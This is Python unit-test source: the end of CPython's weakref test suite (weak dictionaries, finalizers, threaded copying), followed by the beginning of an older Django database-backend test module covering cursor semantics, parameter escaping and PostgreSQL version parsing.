self.assertRaises(KeyError, dict.pop, k)
self.assertNotIn(k, dict)
with testcontext() as (k, v):
dict[k] = v
self.assertEqual(dict[k], v)
ddict = copy.copy(dict)
with testcontext() as (k, v):
dict.update(ddict)
self.assertEqual(dict, ddict)
with testcontext() as (k, v):
dict.clear()
self.assertEqual(len(dict), 0)
def check_weak_del_and_len_while_iterating(self, dict, testcontext):
# Check that len() works when both iterating and removing keys
# explicitly through various means (.pop(), .clear()...), while
# implicit mutation is deferred because an iterator is alive.
# (each call to testcontext() should schedule one item for removal
# for this test to work properly)
o = Object(123456)
with testcontext():
n = len(dict)
            # Since the underlying dict is ordered, the first item is popped
dict.pop(next(dict.keys()))
self.assertEqual(len(dict), n - 1)
dict[o] = o
self.assertEqual(len(dict), n)
# last item in objects is removed from dict in context shutdown
with testcontext():
self.assertEqual(len(dict), n - 1)
# Then, (o, o) is popped
dict.popitem()
self.assertEqual(len(dict), n - 2)
with testcontext():
self.assertEqual(len(dict), n - 3)
del dict[next(dict.keys())]
self.assertEqual(len(dict), n - 4)
with testcontext():
self.assertEqual(len(dict), n - 5)
dict.popitem()
self.assertEqual(len(dict), n - 6)
with testcontext():
dict.clear()
self.assertEqual(len(dict), 0)
self.assertEqual(len(dict), 0)
def test_weak_keys_destroy_while_iterating(self):
# Issue #7105: iterators shouldn't crash when a key is implicitly removed
dict, objects = self.make_weak_keyed_dict()
self.check_weak_destroy_while_iterating(dict, objects, 'keys')
self.check_weak_destroy_while_iterating(dict, objects, 'items')
self.check_weak_destroy_while_iterating(dict, objects, 'values')
self.check_weak_destroy_while_iterating(dict, objects, 'keyrefs')
dict, objects = self.make_weak_keyed_dict()
@contextlib.contextmanager
def testcontext():
try:
it = iter(dict.items())
next(it)
# Schedule a key/value for removal and recreate it
v = objects.pop().arg
gc.collect() # just in case
yield Object(v), v
finally:
it = None # should commit all removals
gc.collect()
self.check_weak_destroy_and_mutate_while_iterating(dict, testcontext)
# Issue #21173: len() fragile when keys are both implicitly and
# explicitly removed.
dict, objects = self.make_weak_keyed_dict()
self.check_weak_del_and_len_while_iterating(dict, testcontext)
def test_weak_values_destroy_while_iterating(self):
# Issue #7105: iterators shouldn't crash when a key is implicitly removed
dict, objects = self.make_weak_valued_dict()
self.check_weak_destroy_while_iterating(dict, objects, 'keys')
self.check_weak_destroy_while_iterating(dict, objects, 'items')
self.check_weak_destroy_while_iterating(dict, objects, 'values')
self.check_weak_destroy_while_iterating(dict, objects, 'itervaluerefs')
self.check_weak_destroy_while_iterating(dict, objects, 'valuerefs')
dict, objects = self.make_weak_valued_dict()
@contextlib.contextmanager
def testcontext():
try:
it = iter(dict.items())
next(it)
# Schedule a key/value for removal and recreate it
k = objects.pop().arg
gc.collect() # just in case
yield k, Object(k)
finally:
it = None # should commit all removals
gc.collect()
self.check_weak_destroy_and_mutate_while_iterating(dict, testcontext)
dict, objects = self.make_weak_valued_dict()
self.check_weak_del_and_len_while_iterating(dict, testcontext)
def test_make_weak_keyed_dict_from_dict(self):
o = Object(3)
dict = weakref.WeakKeyDictionary({o:364})
self.assertEqual(dict[o], 364)
def test_make_weak_keyed_dict_from_weak_keyed_dict(self):
o = Object(3)
dict = weakref.WeakKeyDictionary({o:364})
dict2 = weakref.WeakKeyDictionary(dict)
self.assertEqual(dict[o], 364)
def make_weak_keyed_dict(self):
dict = weakref.WeakKeyDictionary()
objects = list(map(Object, range(self.COUNT)))
for o in objects:
dict[o] = o.arg
return dict, objects
def test_make_weak_valued_dict_from_dict(self):
o = Object(3)
dict = weakref.WeakValueDictionary({364:o})
self.assertEqual(dict[364], o)
def test_make_weak_valued_dict_from_weak_valued_dict(self):
o = Object(3)
dict = weakref.WeakValueDictionary({364:o})
dict2 = weakref.WeakValueDictionary(dict)
self.assertEqual(dict[364], o)
def test_make_weak_valued_dict_misc(self):
# errors
self.assertRaises(TypeError, weakref.WeakValueDictionary.__init__)
self.assertRaises(TypeError, weakref.WeakValueDictionary, {}, {})
self.assertRaises(TypeError, weakref.WeakValueDictionary, (), ())
# special keyword arguments
o = Object(3)
for kw in 'self', 'dict', 'other', 'iterable':
d = weakref.WeakValueDictionary(**{kw: o})
self.assertEqual(list(d.keys()), [kw])
self.assertEqual(d[kw], o)
def make_weak_valued_dict(self):
dict = weakref.WeakValueDictionary()
objects = list(map(Object, range(self.COUNT)))
for o in objects:
dict[o.arg] = o
return dict, objects
def check_popitem(self, klass, key1, value1, key2, value2):
weakdict = klass()
weakdict[key1] = value1
weakdict[key2] = value2
self.assertEqual(len(weakdict), 2)
k, v = weakdict.popitem()
self.assertEqual(len(weakdict), 1)
if k is key1:
self.assertIs(v, value1)
else:
self.assertIs(v, value2)
k, v = weakdict.popitem()
self.assertEqual(len(weakdict), 0)
if k is key1:
self.assertIs(v, value1)
else:
self.assertIs(v, value2)
def test_weak_valued_dict_popitem(self):
self.check_popitem(weakref.WeakValueDictionary,
"key1", C(), "key2", C())
def test_weak_keyed_dict_popitem(self):
self.check_popitem(weakref.WeakKeyDictionary,
C(), "value 1", C(), "value 2")
def check_setdefault(self, klass, key, value1, value2):
self.assertIsNot(value1, value2,
"invalid test"
" -- value parameters must be distinct objects")
weakdict = klass()
o = weakdict.setdefault(key, value1)
self.assertIs(o, value1)
self.assertIn(key, weakdict)
self.assertIs(weakdict.get(key), value1)
self.assertIs(weakdict[key], value1)
o = weakdict.setdefault(key, value2)
self.assertIs(o, value1)
self.assertIn(key, weakdict)
self.assertIs(weakdict.get(key), value1)
self.assertIs(weakdict[key], value1)
def test_weak_valued_dict_setdefault(self):
self.check_setdefault(weakref.WeakValueDictionary,
"key", C(), C())
def test_weak_keyed_dict_setdefault(self):
self.check_setdefault(weakref.WeakKeyDictionary,
C(), "value 1", "value 2")
def check_update(self, klass, dict):
#
# This exercises d.update(), len(d), d.keys(), k in d,
# d.get(), d[].
#
weakdict = klass()
weakdict.update(dict)
self.assertEqual(len(weakdict), len(dict))
for k in weakdict.keys():
self.assertIn(k, dict, "mysterious new key appeared in weak dict")
v = dict.get(k)
self.assertIs(v, weakdict[k])
self.assertIs(v, weakdict.get(k))
for k in dict.keys():
self.assertIn(k, weakdict, "original key disappeared in weak dict")
v = dict[k]
self.assertIs(v, weakdict[k])
self.assertIs(v, weakdict.get(k))
def test_weak_valued_dict_update(self):
self.check_update(weakref.WeakValueDictionary,
{1: C(), 'a': C(), C(): C()})
# errors
self.assertRaises(TypeError, weakref.WeakValueDictionary.update)
d = weakref.WeakValueDictionary()
self.assertRaises(TypeError, d.update, {}, {})
self.assertRaises(TypeError, d.update, (), ())
self.assertEqual(list(d.keys()), [])
# special keyword arguments
o = Object(3)
for kw in 'self', 'dict', 'other', 'iterable':
d = weakref.WeakValueDictionary()
d.update(**{kw: o})
self.assertEqual(list(d.keys()), [kw])
self.assertEqual(d[kw], o)
def test_weak_keyed_dict_update(self):
self.check_update(weakref.WeakKeyDictionary,
{C(): 1, C(): 2, C(): 3})
def test_weak_keyed_delitem(self):
d = weakref.WeakKeyDictionary()
o1 = Object('1')
o2 = Object('2')
d[o1] = 'something'
d[o2] = 'something'
self.assertEqual(len(d), 2)
del d[o1]
self.assertEqual(len(d), 1)
self.assertEqual(list(d.keys()), [o2])
def test_weak_valued_delitem(self):
d = weakref.WeakValueDictionary()
o1 = Object('1')
o2 = Object('2')
d['something'] = o1
d['something else'] = o2
self.assertEqual(len(d), 2)
del d['something']
self.assertEqual(len(d), 1)
self.assertEqual(list(d.items()), [('something else', o2)])
def test_weak_keyed_bad_delitem(self):
d = weakref.WeakKeyDictionary()
o = Object('1')
# An attempt to delete an object that isn't there should raise
# KeyError. It didn't before 2.3.
self.assertRaises(KeyError, d.__delitem__, o)
self.assertRaises(KeyError, d.__getitem__, o)
        # If a key isn't of a weakly referenceable type, __getitem__ and
# __setitem__ raise TypeError. __delitem__ should too.
self.assertRaises(TypeError, d.__delitem__, 13)
self.assertRaises(TypeError, d.__getitem__, 13)
self.assertRaises(TypeError, d.__setitem__, 13, 13)
def test_weak_keyed_cascading_deletes(self):
# SF bug 742860. For some reason, before 2.3 __delitem__ iterated
# over the keys via self.data.iterkeys(). If things vanished from
# the dict during this (or got added), that caused a RuntimeError.
d = weakref.WeakKeyDictionary()
mutate = False
class C(object):
def __init__(self, i):
self.value = i
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
if mutate:
# Side effect that mutates the dict, by removing the
# last strong reference to a key.
del objs[-1]
return self.value == other.value
objs = [C(i) for i in range(4)]
for o in objs:
d[o] = o.value
del o # now the only strong references to keys are in objs
        # Find the order in which iteration sees the keys.
objs = list(d.keys())
# Reverse it, so that the iteration implementation of __delitem__
# has to keep looping to find the first object we delete.
objs.reverse()
# Turn on mutation in C.__eq__. The first time through the loop,
# under the iterkeys() business the first comparison will delete
# the last item iterkeys() would see, and that causes a
# RuntimeError: dictionary changed size during iteration
# when the iterkeys() loop goes around to try comparing the next
# key. After this was fixed, it just deletes the last object *our*
# "for o in obj" loop would have gotten to.
mutate = True
count = 0
for o in objs:
count += 1
del d[o]
self.assertEqual(len(d), 0)
self.assertEqual(count, 2)
def test_make_weak_valued_dict_repr(self):
dict = weakref.WeakValueDictionary()
self.assertRegex(repr(dict), '<WeakValueDictionary at 0x.*>')
def test_make_weak_keyed_dict_repr(self):
dict = weakref.WeakKeyDictionary()
self.assertRegex(repr(dict), '<WeakKeyDictionary at 0x.*>')
def test_threaded_weak_valued_setdefault(self):
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(100000):
x = d.setdefault(10, RefCycle())
self.assertIsNot(x, None) # we never put None in there!
del x
def test_threaded_weak_valued_pop(self):
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(100000):
d[10] = RefCycle()
x = d.pop(10, 10)
self.assertIsNot(x, None) # we never put None in there!
def test_threaded_weak_valued_consistency(self):
# Issue #28427: old keys should not remove new values from
# WeakValueDictionary when collecting from another thread.
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(200000):
o = RefCycle()
d[10] = o
# o is still alive, so the dict can't be empty
self.assertEqual(len(d), 1)
o = None # lose ref
def check_threaded_weak_dict_copy(self, type_, deepcopy):
# `type_` should be either WeakKeyDictionary or WeakValueDictionary.
# `deepcopy` should be either True or False.
exc = []
class DummyKey:
def __init__(self, ctr):
self.ctr = ctr
class DummyValue:
def __init__(self, ctr):
self.ctr = ctr
def dict_copy(d, exc):
try:
if deepcopy is True:
_ = copy.deepcopy(d)
else:
_ = d.copy()
except Exception as ex:
exc.append(ex)
def pop_and_collect(lst):
gc_ctr = 0
while lst:
i = random.randint(0, len(lst) - 1)
gc_ctr += 1
lst.pop(i)
if gc_ctr % 10000 == 0:
gc.collect() # just in case
self.assertIn(type_, (weakref.WeakKeyDictionary, weakref.WeakValueDictionary))
d = type_()
keys = []
values = []
# Initialize d with many entries
for i in range(70000):
k, v = DummyKey(i), DummyValue(i)
keys.append(k)
values.append(v)
d[k] = v
del k
del v
t_copy = threading.Thread(target=dict_copy, args=(d, exc,))
if type_ is weakref.WeakKeyDictionary:
t_collect = threading.Thread(target=pop_and_collect, args=(keys,))
else: # weakref.WeakValueDictionary
t_collect = threading.Thread(target=pop_and_collect, args=(values,))
t_copy.start()
t_collect.start()
t_copy.join()
t_collect.join()
# Test exceptions
if exc:
raise exc[0]
def test_threaded_weak_key_dict_copy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakKeyDictionary, False)
def test_threaded_weak_key_dict_deepcopy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakKeyDictionary, True)
def test_threaded_weak_value_dict_copy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakValueDictionary, False)
def test_threaded_weak_value_dict_deepcopy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakValueDictionary, True)
from test import mapping_tests
class WeakValueDictionaryTestCase(mapping_tests.BasicTestMappingProtocol):
"""Check that WeakValueDictionary conforms to the mapping protocol"""
__ref = {"key1":Object(1), "key2":Object(2), "key3":Object(3)}
type2test = weakref.WeakValueDictionary
def _reference(self):
return self.__ref.copy()
class WeakKeyDictionaryTestCase(mapping_tests.BasicTestMappingProtocol):
"""Check that WeakKeyDictionary conforms to the mapping protocol"""
__ref = {Object("key1"):1, Object("key2"):2, Object("key3"):3}
type2test = weakref.WeakKeyDictionary
def _reference(self):
return self.__ref.copy()
class FinalizeTestCase(unittest.TestCase):
class A:
pass
def _collect_if_necessary(self):
# we create no ref-cycles so in CPython no gc should be needed
if sys.implementation.name != 'cpython':
support.gc_collect()
def test_finalize(self):
def add(x,y,z):
res.append(x + y + z)
return x + y + z
a = self.A()
res = []
f = weakref.finalize(a, add, 67, 43, z=89)
self.assertEqual(f.alive, True)
self.assertEqual(f.peek(), (a, add, (67,43), {'z':89}))
self.assertEqual(f(), 199)
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [199])
res = []
f = weakref.finalize(a, add, 67, 43, 89)
self.assertEqual(f.peek(), (a, add, (67,43,89), {}))
self.assertEqual(f.detach(), (a, add, (67,43,89), {}))
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [])
res = []
f = weakref.finalize(a, add, x=67, y=43, z=89)
del a
self._collect_if_necessary()
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [199])
def test_arg_errors(self):
def fin(*args, **kwargs):
res.append((args, kwargs))
a = self.A()
res = []
f = weakref.finalize(a, fin, 1, 2, func=3, obj=4)
self.assertEqual(f.peek(), (a, fin, (1, 2), {'func': 3, 'obj': 4}))
f()
self.assertEqual(res, [((1, 2), {'func': 3, 'obj': 4})])
with self.assertRaises(TypeError):
weakref.finalize(a, func=fin, arg=1)
with self.assertRaises(TypeError):
weakref.finalize(obj=a, func=fin, arg=1)
self.assertRaises(TypeError, weakref.finalize, a)
self.assertRaises(TypeError, weakref.finalize)
def test_order(self):
a = self.A()
res = []
f1 = weakref.finalize(a, res.append, 'f1')
f2 = weakref.finalize(a, res.append, 'f2')
f3 = weakref.finalize(a, res.append, 'f3')
f4 = weakref.finalize(a, res.append, 'f4')
f5 = weakref.finalize(a, res.append, 'f5')
# make sure finalizers can keep themselves alive
del f1, f4
self.assertTrue(f2.alive)
self.assertTrue(f3.alive)
self.assertTrue(f5.alive)
self.assertTrue(f5.detach())
self.assertFalse(f5.alive)
f5() # nothing because previously unregistered
res.append('A')
f3() # => res.append('f3')
self.assertFalse(f3.alive)
res.append('B')
f3() # nothing because previously called
res.append('C')
del a
self._collect_if_necessary()
# => res.append('f4')
# => res.append('f2')
# => res.append('f1')
self.assertFalse(f2.alive)
res.append('D')
f2() # nothing because previously called by gc
expected = ['A', 'f3', 'B', 'C', 'f4', 'f2', 'f1', 'D']
self.assertEqual(res, expected)
def test_all_freed(self):
# we want a weakrefable subclass of weakref.finalize
class MyFinalizer(weakref.finalize):
pass
a = self.A()
res = []
def callback():
res.append(123)
f = MyFinalizer(a, callback)
wr_callback = weakref.ref(callback)
wr_f = weakref.ref(f)
del callback, f
self.assertIsNotNone(wr_callback())
self.assertIsNotNone(wr_f())
del a
self._collect_if_necessary()
self.assertIsNone(wr_callback())
self.assertIsNone(wr_f())
self.assertEqual(res, [123])
@classmethod
def run_in_child(cls):
def error():
# Create an atexit finalizer from inside a finalizer called
# at exit. This should be the next to be run.
g1 = weakref.finalize(cls, print, 'g1')
print('f3 error')
1/0
# cls should stay alive till atexit callbacks run
f1 = weakref.finalize(cls, print, 'f1', _global_var)
f2 = weakref.finalize(cls, print, 'f2', _global_var)
f3 = weakref.finalize(cls, error)
f4 = weakref.finalize(cls, print, 'f4', _global_var)
assert f1.atexit == True
f2.atexit = False
assert f3.atexit == True
assert f4.atexit == True
def test_atexit(self):
prog = ('from test.test_weakref import FinalizeTestCase;'+
'FinalizeTestCase.run_in_child()')
rc, out, err = script_helper.assert_python_ok('-c', prog)
out = out.decode('ascii').splitlines()
self.assertEqual(out, ['f4 foobar', 'f3 error', 'g1', 'f1 foobar'])
self.assertTrue(b'ZeroDivisionError' in err)
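# Sketch (illustrative, separate from the test above): finalizers registered
# with atexit=True run at interpreter exit in reverse registration order,
# which is why run_in_child() prints f4 before f1 and skips f2 after its
# atexit flag is cleared.
def _demo_atexit_order():
    class Holder:
        pass
    h = Holder()
    weakref.finalize(h, print, 'registered first, runs last')
    weakref.finalize(h, print, 'registered last, runs first')
    return h  # caller keeps the referent alive until interpreter exit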
libreftest = """ Doctest for examples in the library reference: weakref.rst
>>> import weakref
>>> class Dict(dict):
... pass
...
>>> obj = Dict(red=1, green=2, blue=3) # this object is weak referenceable
>>> r = weakref.ref(obj)
>>> print(r() is obj)
True
>>> import weakref
>>> class Object:
... pass
...
>>> o = Object()
>>> r = weakref.ref(o)
>>> o2 = r()
>>> o is o2
True
>>> del o, o2
>>> print(r())
None
>>> import weakref
>>> class ExtendedRef(weakref.ref):
... def __init__(self, ob, callback=None, **annotations):
... super().__init__(ob, callback)
... self.__counter = 0
... for k, v in annotations.items():
... setattr(self, k, v)
... def __call__(self):
... '''Return a pair containing the referent and the number of
... times the reference has been called.
... '''
... ob = super().__call__()
... if ob is not None:
... self.__counter += 1
... ob = (ob, self.__counter)
... return ob
...
>>> class A: # not in docs from here, just testing the ExtendedRef
... pass
...
>>> a = A()
>>> r = ExtendedRef(a, foo=1, bar="baz")
>>> r.foo
1
>>> r.bar
'baz'
>>> r()[1]
1
>>> r()[1]
2
>>> r()[0] is a
True
>>> import weakref
>>> _id2obj_dict = weakref.WeakValueDictionary()
>>> def remember(obj):
... oid = id(obj)
... _id2obj_dict[oid] = obj
... return oid
...
>>> def id2obj(oid):
... return _id2obj_dict[oid]
...
>>> a = A() # from here, just testing
>>> a_id = remember(a)
>>> id2obj(a_id) is a
True
>>> del a
>>> try:
... id2obj(a_id)
... except KeyError:
... print('OK')
... else:
... print('WeakValueDictionary error')
OK
"""
__test__ = {'libreftest' : libreftest}
def test_main():
support.run_unittest(
ReferencesTestCase,
WeakMethodTestCase,
MappingTestCase,
WeakValueDictionaryTestCase,
WeakKeyDictionaryTestCase,
SubclassableWeakrefTestCase,
FinalizeTestCase,
)
support.run_doctest(sys.modules[__name__])
if __name__ == "__main__":
test_main()
|
tests.py
|
# -*- coding: utf-8 -*-
# Unit and doctests for specific database backends.
from __future__ import absolute_import
import datetime
import threading
from django.conf import settings
from django.core.management.color import no_style
from django.core.exceptions import ImproperlyConfigured
from django.db import (backend, connection, connections, DEFAULT_DB_ALIAS,
IntegrityError, transaction)
from django.db.backends.signals import connection_created
from django.db.backends.postgresql_psycopg2 import version as pg_version
from django.db.utils import ConnectionHandler, DatabaseError, load_backend
from django.test import (TestCase, skipUnlessDBFeature, skipIfDBFeature,
TransactionTestCase)
from django.test.utils import override_settings
from django.utils import unittest
from . import models
class OracleChecks(unittest.TestCase):
@unittest.skipUnless(connection.vendor == 'oracle',
"No need to check Oracle cursor semantics")
def test_dbms_session(self):
# If the backend is Oracle, test that we can call a standard
# stored procedure through our cursor wrapper.
convert_unicode = backend.convert_unicode
cursor = connection.cursor()
cursor.callproc(convert_unicode('DBMS_SESSION.SET_IDENTIFIER'),
[convert_unicode('_django_testing!'),])
@unittest.skipUnless(connection.vendor == 'oracle',
"No need to check Oracle cursor semantics")
def test_cursor_var(self):
# If the backend is Oracle, test that we can pass cursor variables
# as query parameters.
cursor = connection.cursor()
var = cursor.var(backend.Database.STRING)
cursor.execute("BEGIN %s := 'X'; END; ", [var])
self.assertEqual(var.getvalue(), 'X')
@unittest.skipUnless(connection.vendor == 'oracle',
"No need to check Oracle cursor semantics")
def test_long_string(self):
# If the backend is Oracle, test that we can save a text longer
# than 4000 chars and read it properly
c = connection.cursor()
c.execute('CREATE TABLE ltext ("TEXT" NCLOB)')
long_str = ''.join([unicode(x) for x in xrange(4000)])
c.execute('INSERT INTO ltext VALUES (%s)',[long_str])
c.execute('SELECT text FROM ltext')
row = c.fetchone()
self.assertEqual(long_str, row[0].read())
c.execute('DROP TABLE ltext')
@unittest.skipUnless(connection.vendor == 'oracle',
"No need to check Oracle connection semantics")
def test_client_encoding(self):
# If the backend is Oracle, test that the client encoding is set
# correctly. This was broken under Cygwin prior to r14781.
connection.cursor() # Ensure the connection is initialized.
self.assertEqual(connection.connection.encoding, "UTF-8")
self.assertEqual(connection.connection.nencoding, "UTF-8")
class MySQLTests(TestCase):
@unittest.skipUnless(connection.vendor == 'mysql',
"Test valid only for MySQL")
def test_autoincrement(self):
"""
Check that auto_increment fields are reset correctly by sql_flush().
Before MySQL version 5.0.13 TRUNCATE did not do auto_increment reset.
Refs #16961.
"""
statements = connection.ops.sql_flush(no_style(),
tables=['test'],
sequences=[{
'table': 'test',
'col': 'somecol',
}])
found_reset = False
for sql in statements:
found_reset = found_reset or 'ALTER TABLE' in sql
if connection.mysql_version < (5,0,13):
self.assertTrue(found_reset)
else:
self.assertFalse(found_reset)
class DateQuotingTest(TestCase):
def test_django_date_trunc(self):
"""
        Test the custom ``django_date_trunc`` method, in particular against
fields which clash with strings passed to it (e.g. 'year') - see
#12818__.
__: http://code.djangoproject.com/ticket/12818
"""
updated = datetime.datetime(2010, 2, 20)
models.SchoolClass.objects.create(year=2009, last_updated=updated)
years = models.SchoolClass.objects.dates('last_updated', 'year')
self.assertEqual(list(years), [datetime.datetime(2010, 1, 1, 0, 0)])
def test_django_extract(self):
"""
        Test the custom ``django_extract`` method, in particular against fields
which clash with strings passed to it (e.g. 'day') - see #12818__.
__: http://code.djangoproject.com/ticket/12818
"""
updated = datetime.datetime(2010, 2, 20)
models.SchoolClass.objects.create(year=2009, last_updated=updated)
classes = models.SchoolClass.objects.filter(last_updated__day=20)
self.assertEqual(len(classes), 1)
class LastExecutedQueryTest(TestCase):
def setUp(self):
# connection.queries will not be filled in without this
settings.DEBUG = True
def tearDown(self):
settings.DEBUG = False
    # There are no tests for the sqlite backend because it does not
    # implement parameter escaping. See #14091.
@unittest.skipUnless(connection.vendor in ('oracle', 'postgresql'),
"These backends use the standard parameter escaping rules")
def test_parameter_escaping(self):
# check that both numbers and string are properly quoted
list(models.Tag.objects.filter(name="special:\\\"':", object_id=12))
sql = connection.queries[-1]['sql']
self.assertTrue("= 'special:\\\"'':' " in sql)
self.assertTrue("= 12 " in sql)
@unittest.skipUnless(connection.vendor == 'mysql',
"MySQL uses backslashes to escape parameters.")
    def test_parameter_escaping_mysql(self):
list(models.Tag.objects.filter(name="special:\\\"':", object_id=12))
sql = connection.queries[-1]['sql']
# only this line is different from the test above
self.assertTrue("= 'special:\\\\\\\"\\':' " in sql)
self.assertTrue("= 12 " in sql)
class ParameterHandlingTest(TestCase):
def test_bad_parameter_count(self):
"An executemany call with too many/not enough parameters will raise an exception (Refs #12612)"
cursor = connection.cursor()
query = ('INSERT INTO %s (%s, %s) VALUES (%%s, %%s)' % (
connection.introspection.table_name_converter('backends_square'),
connection.ops.quote_name('root'),
connection.ops.quote_name('square')
))
self.assertRaises(Exception, cursor.executemany, query, [(1,2,3),])
self.assertRaises(Exception, cursor.executemany, query, [(1,),])
# Unfortunately, the following test class would be a good one to run on all
# backends, but it breaks MySQL hard. Until #13711 is fixed, it can't be run
# everywhere (although it would be an effective test of #13711).
class LongNameTest(TestCase):
"""Long primary keys and model names can result in a sequence name
that exceeds the database limits, which will result in truncation
on certain databases (e.g., Postgres). The backend needs to use
the correct sequence name in last_insert_id and other places, so
    check that it does. Refs #8901.
"""
@skipUnlessDBFeature('supports_long_model_names')
def test_sequence_name_length_limits_create(self):
"""Test creation of model with long name and long pk name doesn't error. Ref #8901"""
models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.objects.create()
@skipUnlessDBFeature('supports_long_model_names')
def test_sequence_name_length_limits_m2m(self):
"""Test an m2m save of a model with a long name and a long m2m field name doesn't error as on Django >=1.2 this now uses object saves. Ref #8901"""
obj = models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.objects.create()
rel_obj = models.Person.objects.create(first_name='Django', last_name='Reinhardt')
obj.m2m_also_quite_long_zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.add(rel_obj)
@skipUnlessDBFeature('supports_long_model_names')
def test_sequence_name_length_limits_flush(self):
"""Test that sequence resetting as part of a flush with model with long name and long pk name doesn't error. Ref #8901"""
        # A full flush is too expensive for this test, so we dig into the
# internals to generate the likely offending SQL and run it manually
# Some convenience aliases
VLM = models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
VLM_m2m = VLM.m2m_also_quite_long_zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.through
tables = [
VLM._meta.db_table,
VLM_m2m._meta.db_table,
]
sequences = [
{
'column': VLM._meta.pk.column,
'table': VLM._meta.db_table
},
]
cursor = connection.cursor()
for statement in connection.ops.sql_flush(no_style(), tables, sequences):
cursor.execute(statement)
class SequenceResetTest(TestCase):
def test_generic_relation(self):
"Sequence names are correct when resetting generic relations (Ref #13941)"
# Create an object with a manually specified PK
models.Post.objects.create(id=10, name='1st post', text='hello world')
# Reset the sequences for the database
cursor = connection.cursor()
commands = connections[DEFAULT_DB_ALIAS].ops.sequence_reset_sql(no_style(), [models.Post])
for sql in commands:
cursor.execute(sql)
# If we create a new object now, it should have a PK greater
# than the PK we specified manually.
obj = models.Post.objects.create(name='New post', text='goodbye world')
self.assertTrue(obj.pk > 10)
class PostgresVersionTest(TestCase):
def assert_parses(self, version_string, version):
self.assertEqual(pg_version._parse_version(version_string), version)
def test_parsing(self):
"""Test PostgreSQL version parsing from `SELECT version()` output"""
self.assert_parses("PostgreSQL 8.3 beta4", 80300)
self.assert_parses("PostgreSQL 8.3", 80300)
self.assert_parses("EnterpriseDB 8.3", 80300)
self.assert_parses("PostgreSQL 8.3.6", 80306)
self.assert_parses("PostgreSQL 8.4beta1", 80400)
self.assert_parses("PostgreSQL 8.3.1 on i386-apple-darwin9.2.2, compiled by GCC i686-apple-darwin9-gcc-4.0.1 (GCC) 4.0.1 (Apple Inc. build 5478)", 80301)
def test_version_detection(self):
"""Test PostgreSQL version detection"""
# Helper mocks
class CursorMock(object):
"Very simple mock of DB-API cursor"
def execute(self, arg):
pass
def fetchone(self):
return ["PostgreSQL 8.3"]
class OlderConnectionMock(object):
"Mock of psycopg2 (< 2.0.12) connection"
def cursor(self):
return CursorMock()
# psycopg2 < 2.0.12 code path
conn = OlderConnectionMock()
self.assertEqual(pg_version.get_version(conn), 80300)
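# Illustrative sketch (not Django's actual implementation) of the parsing
# contract the assertions above pin down: "PostgreSQL X.Y[.Z] ..." maps to
# X * 10000 + Y * 100 + Z, with a missing micro part treated as 0.
import re as _re
def _parse_version_sketch(version_string):
    match = _re.search(r'(\d+)\.(\d+)\.?(\d+)?', version_string)
    major, minor, micro = match.groups()
    return int(major) * 10000 + int(minor) * 100 + int(micro or 0)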
class PostgresNewConnectionTest(TestCase):
"""
#17062: PostgreSQL shouldn't roll back SET TIME ZONE, even if the first
transaction is rolled back.
"""
@unittest.skipUnless(
connection.vendor == 'postgresql' and connection.isolation_level > 0,
"This test applies only to PostgreSQL without autocommit")
def test_connect_and_rollback(self):
new_connections = ConnectionHandler(settings.DATABASES)
new_connection = new_connections[DEFAULT_DB_ALIAS]
try:
            # Ensure the database default time zone is different from
# the time zone in new_connection.settings_dict. We can
# get the default time zone by reset & show.
cursor = new_connection.cursor()
cursor.execute("RESET TIMEZONE")
cursor.execute("SHOW TIMEZONE")
db_default_tz = cursor.fetchone()[0]
new_tz = 'Europe/Paris' if db_default_tz == 'UTC' else 'UTC'
new_connection.close()
# Fetch a new connection with the new_tz as default
# time zone, run a query and rollback.
new_connection.settings_dict['TIME_ZONE'] = new_tz
new_connection.enter_transaction_management()
cursor = new_connection.cursor()
new_connection.rollback()
# Now let's see if the rollback rolled back the SET TIME ZONE.
cursor.execute("SHOW TIMEZONE")
tz = cursor.fetchone()[0]
self.assertEqual(new_tz, tz)
finally:
try:
new_connection.close()
except DatabaseError:
pass
# Unfortunately with sqlite3 the in-memory test database cannot be
# closed, and so it cannot be re-opened during testing, and so we
# sadly disable this test for now.
class ConnectionCreatedSignalTest(TestCase):
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_signal(self):
data = {}
def receiver(sender, connection, **kwargs):
data["connection"] = connection
connection_created.connect(receiver)
connection.close()
cursor = connection.cursor()
self.assertTrue(data["connection"].connection is connection.connection)
connection_created.disconnect(receiver)
data.clear()
cursor = connection.cursor()
self.assertTrue(data == {})
class EscapingChecks(TestCase):
@unittest.skipUnless(connection.vendor == 'sqlite',
"This is a sqlite-specific issue")
def test_parameter_escaping(self):
#13648: '%s' escaping support for sqlite3
cursor = connection.cursor()
response = cursor.execute(
"select strftime('%%s', date('now'))").fetchall()[0][0]
self.assertNotEqual(response, None)
        # response should be a non-zero integer
self.assertTrue(int(response))
class BackendTestCase(TestCase):
def create_squares_with_executemany(self, args):
cursor = connection.cursor()
opts = models.Square._meta
